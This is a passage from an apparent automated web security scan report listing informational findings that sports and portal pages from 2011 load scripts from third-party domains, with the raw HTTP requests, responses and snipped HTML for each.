User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 277828
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=9
Date: Sat, 29 Jan 2011 23:49:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</script>-->
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/js/vp.js"></script>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.249. http://msn.foxsports.com/nhl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nhl

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /nhl HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 263611
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=1
Date: Sat, 29 Jan 2011 23:49:19 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</script>-->
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/js/vp.js"></script>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.250. http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/?GT1=39002 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 249503
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=20
Date: Sat, 29 Jan 2011 23:49:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
http://static.foxsports.com/cgi-bin/merge?files=/fe/css/story/story_tools.css,/fe/css/story/storyPage.css,/fe/css/multimediaCP.css&contentType=text/css&v=3_149_37" rel="stylesheet" type="text/css"/>

<script type="text/javascript" src="http://images.video.redacted/js/ch/Channels.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/flash/script/embed.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2275" name="cleanprintloader" ></script>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.251. http://msn.foxsports.com/olympics/story/ian-thorpe-reportedly-mounting-comeback-for-2012-olympics-012911

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /olympics/story/ian-thorpe-reportedly-mounting-comeback-for-2012-olympics-012911

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /olympics/story/ian-thorpe-reportedly-mounting-comeback-for-2012-olympics-012911 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 225369
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=16
Date: Sat, 29 Jan 2011 23:50:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
http://static.foxsports.com/cgi-bin/merge?files=/fe/css/story/story_tools.css,/fe/css/story/storyPage.css,/fe/css/multimediaCP.css&contentType=text/css&v=3_149_37" rel="stylesheet" type="text/css"/>

<script type="text/javascript" src="http://images.video.redacted/js/ch/Channels.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/flash/script/embed.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2275" name="cleanprintloader" ></script>
...[SNIP]...
<div class="parentWrapper">
   <script type="text/javascript" language="JavaScript" src="http://www4.tinker.com/standard/wrapper/wrapper.js?id=1470"></script>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.252. http://msn.foxsports.com/video

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /video

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /video?from=en-us_msnhp HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 210513
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=31
Date: Sat, 29 Jan 2011 23:49:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
<link type="text/css" rel="stylesheet" href="/component/cssjs/VideoCSS" />

<script type="text/javascript" lang="javascript" src="http://cdn.gigya.com/JS/socialize.js?apikey=2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/js/vp.js"></script>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.253. http://msn.whitepages.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.whitepages.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: msn.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.37 (Unix) mod_perl/1.30
Vary: Accept-Encoding
Content-Type: text/html
Date: Sat, 29 Jan 2011 23:50:09 GMT
Connection: close
Set-Cookie: wpn_persistent=max_utype%3Ddefault%26PID%3DTUSnsawQAEcAADI6GyA%26times_seen_invite%3D%26filled_demo_survey%3D%26wp_stage%3Dproduction%26persistent_search_count%3D%26had_successful_search%3D; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.whitepages.com
Set-Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; path=/; domain=.whitepages.com
Content-Length: 34492


            <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
           <html>
<head>
<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=A06546"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://stj.redacted/br/om/js/lt/lt.js"></script>
...[SNIP]...

23.254. http://music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Summary

Severity:   Information
Confidence:   Certain
Host:   http://music.aol.com
Path:   /radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: music.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 /radioguide/bb/$%7Chttp:/money.aol.com/$%7Chttp:/www.aim.com/help_faq/starting_out/buddylist.adp/$%7Chttp:/www.weblogs.com/$%7Chttp:/smallbusiness.aol.com/$%7Chttp:/www.blackvoices.com/$%7Chttp:/latino.aol.com/$%7C.ivillage.com.*/1%7Cwww.ivillage.com/(celeb-news%7Centertainment-photos%7Ctv%7Cfor-kids%7Cvideo%7Centertainment%7Cmovies%7Cfood%7Crecipes%7Ctable-talk%7Cfood-for-kids%7Cfood-advice%7Cfood-news%7Cfood-video
Date: Sun, 30 Jan 2011 02:16:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Keep-Alive: timeout=5, max=55
Connection: Keep-Alive
Content-Length: 22064


<//jsp:useBean id="bbFactory" type="com.aol.entertainment.core.beans.BigBowlModuleBeanFactory" scope="application"/>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http:
...[SNIP]...
</link>
<script type="text/javascript" src="http://o.aolcdn.com/art/merge?f=/_media/ch_music2/moo-12-all.js&f=/_media/ch_music2/com_aol_music_shared.js&f=/_media/ch_music2/cannae_cross_promo.js&f=/_media/music_en_us_js/jquery-1.3.2.min.js&f=/_media/ch_music2/jquery.noconflict.js&f=/_media/music_en_us_js/jquery.authlinkhandler-min.js&f=/_media/music_en_us_js/jquery.globalsearchbox.js&f=/_media/music_en_us_js/jquery.globalheader.js&expsec=31536000&ver=40"></script>


    <script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
<script src="http://siterecruit.comscore.com/sr/aol/broker.js" language="JavaScript"></script>
...[SNIP]...

23.255. http://music.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://music.redacted
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: music.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 96630
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=d50ddeb179d249659073f8d313a6170a; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:50:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   MSN Music:
...[SNIP]...
</SCRIPT>
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section --><script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

23.256. http://nbcsports.msnbc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nbcsports.msnbc.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: nbcsports.msnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Cache-Control: no-cache
Expires: Sun, 30 Jan 2011 02:17:04 GMT
Date: Sun, 30 Jan 2011 02:17:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 111617

<!DOCTYPE html><html lang="en"><head><title>Sports News Headlines - NFL, NBA, NHL, MLB, PGA, NASCAR - Scores, Game Highlights, Schedules &amp; Team Rosters - NBC Sports</title><link rel="stylesheet" t
...[SNIP]...
</script><script type="text/javascript" src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="NBC Sports ... Top Stories" href="http://rss.nbcsports.msnbc.com/id/3032112/device/rss/rss.xml" /><script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</script>

<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667309"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667316"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667311"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667313"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667314"></script>
...[SNIP]...
<div class="dpn"><script type="text/javascript" src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

23.257. http://nbcsports.msnbc.com/id/41322933/ns/sports-super_bowl_xlv/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nbcsports.msnbc.com
Path:   /id/41322933/ns/sports-super_bowl_xlv/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41322933/ns/sports-super_bowl_xlv/ HTTP/1.1
Host: nbcsports.msnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
ETag: "634319175391900000"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Cnection: close
Cache-Control: private, max-age=22
Date: Sun, 30 Jan 2011 02:17:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 99374

<!DOCTYPE html><html lang="en"><head><title>NFL riding remarkable TV ratings into Super Bowl - Super Bowl XLV- NBC Sports</title><link rel="stylesheet" type="text/css" href="/id/38167591" /><script ty
...[SNIP]...
</script><script type="text/javascript" src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="NBC Sports ... Top Stories" href="http://rss.nbcsports.msnbc.com/id/3032112/device/rss/rss.xml" /><script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</script>

<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667309"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667316"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667311"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667313"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667314"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="pulse">
<script src="http://content.pulse360.com/73ABDCFC-BCD8-11DE-AC71-E60FEDADD848" type="text/javascript"></script>
...[SNIP]...
<div class="dpn"><script type="text/javascript" src="http://www.nbcudigitaladops.com/hosted/global.js"></script></div><!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://nbcsports.us.intellitxt.com/intellitxt/front.asp?ipid=19942"></script>
...[SNIP]...

23.258. http://nbcsports.msnbc.com/id/41323678/ns/sports-tennis/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nbcsports.msnbc.com
Path:   /id/41323678/ns/sports-tennis/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41323678/ns/sports-tennis/ HTTP/1.1
Host: nbcsports.msnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
ETag: "634319267483270000"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Cache-Control: private, max-age=60
Date: Sun, 30 Jan 2011 02:17:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 102611

<!DOCTYPE html><html lang="en"><head><title>Clijsters rallies to top Li in Aussie final - Tennis- NBC Sports</title><link rel="stylesheet" type="text/css" href="/id/38167591" /><script type="text/java
...[SNIP]...
</script><script type="text/javascript" src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="NBC Sports ... Top Stories" href="http://rss.nbcsports.msnbc.com/id/3032112/device/rss/rss.xml" /><script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</script>

<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667309"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667316"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667311"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667313"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667314"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="pulse">
<script src="http://content.pulse360.com/73ABDCFC-BCD8-11DE-AC71-E60FEDADD848" type="text/javascript"></script>
...[SNIP]...
<div class="dpn"><script type="text/javascript" src="http://www.nbcudigitaladops.com/hosted/global.js"></script></div><!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://nbcsports.us.intellitxt.com/intellitxt/front.asp?ipid=19942"></script>
...[SNIP]...

23.259. http://nbcsports.msnbc.com/id/41325676/ns/sports-tennis/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nbcsports.msnbc.com
Path:   /id/41325676/ns/sports-tennis/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41325676/ns/sports-tennis/ HTTP/1.1
Host: nbcsports.msnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
ETag: "634319218344200000"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Cnection: close
Cache-Control: private, max-age=19
Date: Sun, 30 Jan 2011 02:17:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 97683

<!DOCTYPE html><html lang="en"><head><title>Li lashes out at Chinese fans during Aussie final - Tennis- NBC Sports</title><link rel="stylesheet" type="text/css" href="/id/38167591" /><script type="tex
...[SNIP]...
</script><script type="text/javascript" src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="NBC Sports ... Top Stories" href="http://rss.nbcsports.msnbc.com/id/3032112/device/rss/rss.xml" /><script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</script>

<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667309"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667316"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667311"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667313"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667314"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="pulse">
<script src="http://content.pulse360.com/73ABDCFC-BCD8-11DE-AC71-E60FEDADD848" type="text/javascript"></script>
...[SNIP]...
<div class="dpn"><script type="text/javascript" src="http://www.nbcudigitaladops.com/hosted/global.js"></script></div><!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://nbcsports.us.intellitxt.com/intellitxt/front.asp?ipid=19942"></script>
...[SNIP]...

23.260. http://nbcsports.msnbc.com/id/41326839/ns/sports-college_basketball/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nbcsports.msnbc.com
Path:   /id/41326839/ns/sports-college_basketball/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41326839/ns/sports-college_basketball/ HTTP/1.1
Host: nbcsports.msnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
ETag: "634319334793030000"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Cnection: close
Cache-Control: private, max-age=56
Date: Sun, 30 Jan 2011 02:17:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 87190

<!DOCTYPE html><html lang="en"><head><title>No. 23 Louisville rallies, tops No. 5 UConn in 2 OT - College basketball- NBC Sports</title><link rel="stylesheet" type="text/css" href="/id/38167591" /><sc
...[SNIP]...
</script><script type="text/javascript" src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="NBC Sports ... Top Stories" href="http://rss.nbcsports.msnbc.com/id/3032112/device/rss/rss.xml" /><script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</script>

<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667309"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667316"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667311"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667313"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667314"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="pulse">
<script src="http://content.pulse360.com/73ABDCFC-BCD8-11DE-AC71-E60FEDADD848" type="text/javascript"></script>
...[SNIP]...
<div class="dpn"><script type="text/javascript" src="http://www.nbcudigitaladops.com/hosted/global.js"></script></div><!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://nbcsports.us.intellitxt.com/intellitxt/front.asp?ipid=19942"></script>
...[SNIP]...

23.261. http://nbcsports.msnbc.com/id/41328610/ns/sports-college_basketball/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nbcsports.msnbc.com
Path:   /id/41328610/ns/sports-college_basketball/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41328610/ns/sports-college_basketball/ HTTP/1.1
Host: nbcsports.msnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
ETag: "634319386759430000"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Cnection: close
Cache-Control: private, max-age=21
Date: Sun, 30 Jan 2011 02:17:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 85641

<!DOCTYPE html><html lang="en"><head><title>Orange woes continue with loss at Marquette - College basketball- NBC Sports</title><link rel="stylesheet" type="text/css" href="/id/38167591" /><script typ
...[SNIP]...
</script><script type="text/javascript" src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="NBC Sports ... Top Stories" href="http://rss.nbcsports.msnbc.com/id/3032112/device/rss/rss.xml" /><script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</script>

<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667309"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667316"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667311"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667313"></script>
<script language="JavaScript" type="text/javascript" src="http://www.msnbc.msn.com/id/40667314"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="pulse">
<script src="http://content.pulse360.com/73ABDCFC-BCD8-11DE-AC71-E60FEDADD848" type="text/javascript"></script>
...[SNIP]...
<div class="dpn"><script type="text/javascript" src="http://www.nbcudigitaladops.com/hosted/global.js"></script></div><!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://nbcsports.us.intellitxt.com/intellitxt/front.asp?ipid=19942"></script>
...[SNIP]...

23.262. http://netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Summary

Severity:   Information
Confidence:   Certain
Host:   http://netscape.aol.com
